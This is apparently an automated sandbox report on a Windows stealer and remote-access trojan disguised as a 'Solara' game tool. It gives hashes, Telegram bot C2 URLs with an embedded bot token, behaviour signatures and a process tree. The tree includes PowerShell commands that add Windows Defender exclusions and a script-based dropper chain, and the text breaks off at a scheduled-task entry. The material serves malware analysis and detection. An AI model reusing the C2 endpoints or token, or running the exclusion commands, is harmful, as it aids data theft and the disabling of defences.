Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-07-2024 05:06

General

  • Target

    eab2a5792346b8b55180359658308c54766541505b88f55cbdf86add05edffd5.exe

  • Size

    2.9MB

  • MD5

    ae3ebf1bdd4cfaaf60058c82c1e3075f

  • SHA1

    7cd11b62afe32197e71c18fd480912e5166a19a5

  • SHA256

    eab2a5792346b8b55180359658308c54766541505b88f55cbdf86add05edffd5

  • SHA512

    4424a2614b0b73bbffe39a4f0b68d41f8f90488333995ce7d47f97274bf6d9b051a0c92511e7df3949478bb2e7d1a1923ef94058a78a6b3bf06aca1738e6be34

  • SSDEEP

    49152:iBojA1ji5x2V6bA30eGCYdDwhc2Mmpj+6y0bgli9xPMC6Mux:iU5jbimFwhc2zjb3glukrx

Malware Config

Extracted

Family

gurcu

C2

https://api.telegram.org/bot7121631902:AAErn17xNWrdiucOEwhQIj8v6o5tvdffJT4/sendPhoto?chat_id=7391062786&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%208f21045c62c00476fa1fad6a7d6fb9a03faa10e3%0A%E2%80%A2%20Comment%3A%20proliv%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20ENXQHETB%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20191.101.209.39%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CUsers%5CAdmin%5CSendTo%5Cwininit.ex

https://api.telegram.org/bot7121631902:AAErn17xNWrdiucOEwhQIj8v6o5tvdffJT4/sendDocument?chat_id=7391062786&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%208f21045c62c00476fa1fad6a7d6fb9a03faa10e3%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A26.044753

Signatures

  • DcRat 44 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Modifies WinLogon for persistence 2 TTPs 14 IoCs
  • Process spawned unexpected child process 42 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • DCRat payload 4 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 11 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 28 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 27 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry class 32 IoCs
  • NTFS ADS 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 42 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 34 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\eab2a5792346b8b55180359658308c54766541505b88f55cbdf86add05edffd5.exe
    "C:\Users\Admin\AppData\Local\Temp\eab2a5792346b8b55180359658308c54766541505b88f55cbdf86add05edffd5.exe"
    1⤵
    • DcRat
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4680
    • C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
      "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4028
      • C:\Windows\SysWOW64\msiexec.exe
        "msiexec" /i "C:\Users\Admin\AppData\Local\Temp\node-v18.16.0-x64.msi" /qn
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1708
      • C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe
        "C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe" /install /quiet /norestart
        3⤵
        • Executes dropped EXE
        PID:4136
        • C:\Windows\Temp\{11221525-44C3-4AC5-ACA3-C5A7DB856D6B}\.cr\vc_redist.x64.exe
          "C:\Windows\Temp\{11221525-44C3-4AC5-ACA3-C5A7DB856D6B}\.cr\vc_redist.x64.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\vc_redist.x64.exe" -burn.filehandle.attached=540 -burn.filehandle.self=548 /install /quiet /norestart
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:2356
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/pizzaboxer/bloxstrap/releases/download/v2.5.4/Bloxstrap-v2.5.4.exe
        3⤵
        • Enumerates system info in registry
        • NTFS ADS
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:5748
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffde2b046f8,0x7ffde2b04708,0x7ffde2b04718
          4⤵
            PID:5768
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,16767846247972243505,14471439917703668158,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2064 /prefetch:2
            4⤵
              PID:5976
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,16767846247972243505,14471439917703668158,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2444 /prefetch:3
              4⤵
                PID:5988
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,16767846247972243505,14471439917703668158,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:8
                4⤵
                  PID:5996
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,16767846247972243505,14471439917703668158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
                  4⤵
                    PID:6140
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,16767846247972243505,14471439917703668158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
                    4⤵
                      PID:456
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,16767846247972243505,14471439917703668158,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5284 /prefetch:8
                      4⤵
                        PID:4964
                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2068,16767846247972243505,14471439917703668158,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5284 /prefetch:8
                        4⤵
                          PID:720
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,16767846247972243505,14471439917703668158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5332 /prefetch:1
                          4⤵
                            PID:4420
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,16767846247972243505,14471439917703668158,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1
                            4⤵
                              PID:2140
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2068,16767846247972243505,14471439917703668158,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5568 /prefetch:8
                              4⤵
                                PID:4952
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,16767846247972243505,14471439917703668158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4664 /prefetch:1
                                4⤵
                                  PID:1904
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,16767846247972243505,14471439917703668158,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5944 /prefetch:1
                                  4⤵
                                    PID:5400
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,16767846247972243505,14471439917703668158,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:1
                                    4⤵
                                      PID:396
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2068,16767846247972243505,14471439917703668158,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6316 /prefetch:8
                                      4⤵
                                        PID:5436
                                    • C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe
                                      "C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe"
                                      3⤵
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Checks whether UAC is enabled
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      PID:1176
                                      • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe
                                        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --noerrdialogs --embedded-browser-webview-dpi-awareness=1 --enable-features=MojoIpcz --mojo-named-platform-channel-pipe=1176.1436.17605451080678221943
                                        4⤵
                                        • Enumerates system info in registry
                                        • Modifies data under HKEY_USERS
                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                        PID:3516
                                        • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe
                                          "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=125.0.6422.142 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=125.0.2535.92 --initial-client-data=0x15c,0x160,0x164,0x138,0x16c,0x7ffdccb64ef8,0x7ffdccb64f04,0x7ffdccb64f10
                                          5⤵
                                            PID:4972
                                          • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe
                                            "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --type=gpu-process --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1744,i,16364827045942044167,15986682114201824397,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=1696 /prefetch:2
                                            5⤵
                                              PID:3728
                                            • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe
                                              "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --field-trial-handle=1336,i,16364827045942044167,15986682114201824397,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=2032 /prefetch:3
                                              5⤵
                                                PID:4812
                                              • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe
                                                "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --field-trial-handle=2308,i,16364827045942044167,15986682114201824397,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=2324 /prefetch:8
                                                5⤵
                                                  PID:2756
                                                • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe
                                                  "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\125.0.2535.92\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --field-trial-handle=3628,i,16364827045942044167,15986682114201824397,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=3640 /prefetch:1
                                                  5⤵
                                                    PID:4044
                                            • C:\Users\Admin\AppData\Local\Temp\FinalMom.exe
                                              "C:\Users\Admin\AppData\Local\Temp\FinalMom.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              PID:3700
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 988
                                                3⤵
                                                • Program crash
                                                PID:2256
                                            • C:\Users\Admin\AppData\Local\Temp\solara.exe
                                              "C:\Users\Admin\AppData\Local\Temp\solara.exe"
                                              2⤵
                                              • Checks computer location settings
                                              • Executes dropped EXE
                                              • Modifies registry class
                                              • Suspicious use of WriteProcessMemory
                                              PID:560
                                              • C:\Windows\SysWOW64\WScript.exe
                                                "C:\Windows\System32\WScript.exe" "C:\Surrogateprovidercomponentsessionmonitor\oIWytMk.vbe"
                                                3⤵
                                                • Checks computer location settings
                                                • Suspicious use of WriteProcessMemory
                                                PID:1892
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c ""C:\Surrogateprovidercomponentsessionmonitor\GPEuaUZk.bat" "
                                                  4⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:2928
                                                  • C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                                    "C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe"
                                                    5⤵
                                                    • DcRat
                                                    • Modifies WinLogon for persistence
                                                    • Checks computer location settings
                                                    • Executes dropped EXE
                                                    • Adds Run key to start application
                                                    • Drops file in Windows directory
                                                    • Modifies registry class
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:3216
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe'
                                                      6⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1796
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\backgroundTaskHost.exe'
                                                      6⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3272
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Reference Assemblies\Microsoft\taskhostw.exe'
                                                      6⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2196
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\dwm.exe'
                                                      6⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4928
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\RuntimeBroker.exe'
                                                      6⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4784
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Mail\wininit.exe'
                                                      6⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1684
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Web\Wallpaper\Theme1\browserwinsvc.exe'
                                                      6⤵
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3680
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Ay4kWcSHg7.bat"
                                                      6⤵
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:4544
                                                      • C:\Windows\system32\w32tm.exe
                                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                        7⤵
                                                          PID:4920
                                                        • C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe
                                                          "C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe"
                                                          7⤵
                                                          • Modifies WinLogon for persistence
                                                          • Checks computer location settings
                                                          • Executes dropped EXE
                                                          • Adds Run key to start application
                                                          • Drops file in Windows directory
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:3556
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\browserwinsvc.exe'
                                                            8⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4624
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\upfc.exe'
                                                            8⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4560
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\GameBarPresenceWriter\msiexec.exe'
                                                            8⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4688
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\VideoLAN\VLC\lua\playlist\RuntimeBroker.exe'
                                                            8⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:5088
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Multimedia Platform\dllhost.exe'
                                                            8⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:3680
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Surrogateprovidercomponentsessionmonitor\TrustedInstaller.exe'
                                                            8⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4564
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\VideoLAN\VLC\locale\RuntimeBroker.exe'
                                                            8⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4420
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\SendTo\wininit.exe'
                                                            8⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4568
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\spoolsv.exe'
                                                            8⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2628
                                                          • C:\Users\Admin\SendTo\wininit.exe
                                                            "C:\Users\Admin\SendTo\wininit.exe"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious behavior: GetForegroundWindowSpam
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4436
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3700 -ip 3700
                                              1⤵
                                                PID:2332
                                              • C:\Windows\system32\schtasks.exe
